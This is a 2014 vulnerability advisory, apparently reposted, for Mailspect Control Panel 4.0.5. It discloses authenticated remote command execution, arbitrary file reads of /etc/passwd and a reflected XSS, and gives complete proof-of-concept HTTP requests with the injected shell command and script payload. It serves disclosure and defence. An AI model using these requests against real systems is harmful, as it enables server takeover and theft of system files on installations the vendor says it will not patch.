Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities

Bài liên quan

Document Title:

============

Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities

 

Release Date:

===========

June 21, 2014

 

Product & Service Introduction:

========================

Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York.   The Mailspect product suite was launched

in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin. 

 

Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter.  Subsequently,

the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in

content filers and reputation engines.

 

Abstract Advisory Information:

=======================

BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel

4.0.5 web application.

 

Vulnerability Disclosure Timeline:

=========================

May 4, 2014  :  Contact with Vendor

May 16, 2014  :  Vendor Response

June 21, 2014  :  Public Disclosure

 

Discovery Status:

=============

Published

 

Affected Product(s):

===============

Multilayered Email Security & Archive for Gateways, MTA's & Servers

Product: Mailspect Control Panel 4.0.5

Other versions may be affected.

 

Exploitation Technique:

==================

RCE:  Remote, Authenticated

AFR:  Remote, Authenticated

XSS:  Remote, Unauthenticated

 

Severity Level:

===========

High

 

Technical Details & Description:

========================

1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >

/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to

"status_info.cgi?group=default" page.

Other parameters with the suffix "_cmd" are probably vulnerable.

 

2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary

file name like "/etc/passwd" will cause the file's content's disclosure.

 

3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"

will cause the file's content's disclosure.

 

4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads

the Javascript code's execution.

 

Proof of Concept (PoC):

==================

Proof of Concept RCE Request:

 

POST /system_module.cgi HTTP/1.1

Host: 192.168.41.142:20001

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.41.142:20001/system_module.cgi?group=default

Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;

p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 1282

  

post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60

 

2. Proof of Concept AFR Request 1:

 

GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1

Host: 192.168.41.142:20001

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default

Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;

p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706

Connection: keep-alive

 

3. Proof of Concept AFR Request 2:

 

POST /monitor_manage_logs.cgi HTTP/1.1

Host: 192.168.41.142:20001

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default

Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;

p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 85

  

group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on

 

4. Proof of Concept XSS Request:

 

GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1

Host: 192.168.41.142:20001

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

 

Solution Fix & Patch:

================

XSS will be patched at version 4.0.7

There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.

 

Security Risk:

==========

The risk of the vulnerabilities above estimated as high.

 

Credits & Authors:

==============

Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAÞ

 

Disclaimer & Information:

===================

The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or

implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any

case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

       

Domain:  www.bga.com.tr/advisories.html

Social:    twitter.com/bgasecurity

Contact:  bilgi@bga.com.tr

   

Copyright © 2014 | BGA Security